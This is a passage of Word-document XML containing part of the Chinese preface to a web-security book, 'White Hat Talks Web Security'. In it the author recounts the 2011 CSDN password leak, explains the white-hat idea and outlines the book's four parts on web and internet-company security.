          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1000 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>名工程师的代码安全，方法肯定也要有所不同。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>互联网公司安全还有一些鲜明的特色，比如注重用户体验、注重性能、注重产品发布时间， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>因此传统的安全方案在这样的环境下可能完全行不通。这对安全工作提出了更高的要求和更大的挑战。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="156"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>这些问题，使我感觉到，互联网公司安全可能会成为一门新的学科，或者说应该把安全技</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>术变得更加工业化。可是我在书店中，却发现安全类目的书，要么是极为学术化的</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（一般人看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>不懂</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>教科书，要么就是极为娱乐化的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>比如一些“黑客工具说明书”类型的书）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:w w:val="95"/>
        </w:rPr>
        <w:t>说明书。极   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>少数能够深入剖析安全技术原理的书，以我的经验看来，在工业化的环境中也会存在各种各样的问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="152"/>
        <w:ind w:left="203" w:right="125" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>这些问题，也就促使我萌发了一种写一本自己的书，分享多年来工作心得的想法。它将是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>一本阐述安全技术在企业级应用中实践的书，是一本大型互联网公司的工程师能够真正用得上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>的安全参考书。因此张春雨先生一提到邀请我写书的想法时，我没有做过多的思考，就答应了。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:ind w:right="219"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t>V </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="141"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>是互联网的核心，是未来云计算和移动互联网的最佳载体，因此 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>安全也是互联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>网公司安全业务中最重要的组成部分。我近年来的研究重心也在于此，因此将选题范围定在了</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="221"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>安全。但其实本书的很多思路并不局限于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>安全，而是可以放宽到整个互联网安全的方方面面之中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="216" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>掌握了以正确的思路去看待安全问题，在解决它们时，都将无往而不利。我在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>2007 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>年的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>时候，意识到了掌握这种正确思维方式的重要性，因此我告知好友：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>安全工程师的核心竞争力不在于他能拥有多少个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>0day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，掌握多少种安全技术，而是在于他对安全理解的深度，以及由此引申的看待安全问题的角度和高度。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>我是如此想的，也是如此做的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="120" w:firstLine="400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>因此在本书中，我认为最可贵的不是那一个个工业化的解决方案，而是在解决这些问题时， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>背后的思考过程。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>我们不是要做一个能够解决问题的方案，而是要做一个能够“漂亮地”解决问题的方案。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>这是每一名优秀的安全工程师所应有的追求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>安全启蒙运动</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="209"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>然而在当今的互联网行业中，对安全的重视程度普遍不高。有统计显示，互联网公司对安全的投入不足收入的百分之一。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="203" w:right="142" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2011 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年岁末之际，中国互联网突然卷入了一场有史以来最大的安全危机。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>月 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>21 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>日， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>国内最大的开发者社区 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSDN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>被黑客在互联网上公布了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>600 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>万注册用户的数据。更糟糕的是， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSDN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>在数据库中明文保存了用户的密码。接下来如同一场盛大的交响乐，黑客随后陆续公布了网易、人人、天涯、猫扑、多玩等多家大型网站的数据库，一时间风声鹤唳，草木皆兵。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="219" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t>这些数据其实在黑客的地下世界中已经辗转流传了多年，牵扯到了一条巨大的黑色产业</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>链。这次的偶然事件使之浮出水面，公之于众，也让用户清醒地认识到中国互联网的安全现状有多么糟糕。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>以往类似的事件我都会在博客上说点什么，但这次我保持了沉默。因为一来知道此种状况</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>已经多年，网站只是在为以前的不作为而买单；二来要解决“拖库”的问题，其实是要解决整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>个互联网公司的安全问题，远非保证一个数据库的安全这么简单。这不是通过一段文字、一篇文章就能够讲清楚的。但我想最好的答案，可以在本书中找到。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>经历这场危机之后，希望整个中国互联网，在安全问题的认识上，能够有一个新的高度。那这场危机也就物有所值，或许还能借此契机成就中国互联网的一场安全启蒙运动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>这是我的第一本书，也是我坚持自己一个人写完的书，因此可以在书中尽情地阐述自己的安全世界观，且对书中的任何错漏之处以及不成熟的观点都没有可以推卸责任的借口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>由于工作繁忙，写此书只能利用业余时间，交稿时间多次推迟，深感写书的不易。但最终</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>能成书，则有赖于各位亲朋的支持，以及编辑的鼓励，在此深表感谢。本书中很多地方未能写</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:spacing w:before="78"/>
        <w:ind w:left="205"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="90"/>
        </w:rPr>
        <w:t>VI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="65"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:top="1400" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="141"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>得更为深入细致，实乃精力有限所致，尚请多多包涵。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>关于白帽子</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="209"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在安全圈子里，素有“白帽”、“黑帽”一说。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="309" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="203" w:right="218" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>黑帽子是指那些造成破坏的黑客，而白帽子则是研究安全，但不造成破坏的黑客。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>白帽子均以建设更安全的互联网为己任</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>我于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2008 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>年开始在国内互联网行业中倡导白帽子的理念，并联合了一些主要互联网公司的安全工程师，建立了白帽子社区，旨在交流工作中遇到的各种问题，以及经验心得。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="220" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>本书名为《白帽子讲 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t>安全》，即是站在白帽子的视角，讲述 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>安全的方方面面。虽</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>然也剖析攻击原理，但更重要的是如何防范这些问题。同时也希望“白帽子”这一理念，能够更加的广为人知，为中国互联网所接受。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:left="203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>本书结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="210"/>
        <w:ind w:left="202" w:right="223" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>全书分为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>大篇共 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>18 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>章，读者可以通过浏览目录以进一步了解各篇章的内容。在有的章节末尾，还附上了笔者曾经写过的一些博客文章，可以作为延伸阅读以及本书正文的补充。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="160"/>
        <w:ind w:left="203" w:right="223" w:firstLine="403"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>第一篇 我的安全世界观</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>是全书的纲领。在此篇中先回顾了安全的历史，然后阐述了笔者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>对安全的看法与态度，并提出了一些思考问题的方式以及做事的方法。理解了本篇，就能明白全书中所涉及的解决方案在抉择时的取舍。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="221" w:firstLine="403"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t>第二篇 客户端脚本安全</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>就当前比较流行的客户端脚本攻击进行了深入阐述。当网站的安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>全做到一定程度后，黑客可能难以再找到类似注入攻击、脚本执行等高风险的漏洞，从而可能将注意力转移到客户端脚本攻击上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>客户端脚本安全与浏览器的特性息息相关，因此对浏览器的深入理解将有助于做好客户端脚本安全的解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>如果读者所要解决的问题比较严峻，比如网站的安全是从零开始，则建议跳过此篇，先阅</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>读下一篇“服务器端应用安全”，解决优先级更高的安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="159"/>
        <w:ind w:left="203" w:right="223" w:firstLine="403"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>第三篇 服务器端应用安全</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>就常见的服务器端应用安全问题进行了阐述。这些问题往往能引起非常严重的后果，在网站的安全建设之初需要优先解决这些问题，避免留下任何隐患。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="307" w:lineRule="auto" w:before="160"/>
        <w:ind w:left="203" w:right="223" w:firstLine="403"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>第四篇 互联网公司安全运营</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>提出了一个大安全运营的思想。安全是一个持续的过程，最终仍然要由安全工程师来保证结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="160"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>在本篇中，首先就互联网业务安全问题进行了一些讨论，这些问题对于互联网公司来说有时候会比漏洞更为重要。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:ind w:right="221"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t>VII </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
          <w:b/>
          <w:w w:val="70"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Office Symbol Bold" w:hAnsi="MS Office Symbol Bold"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
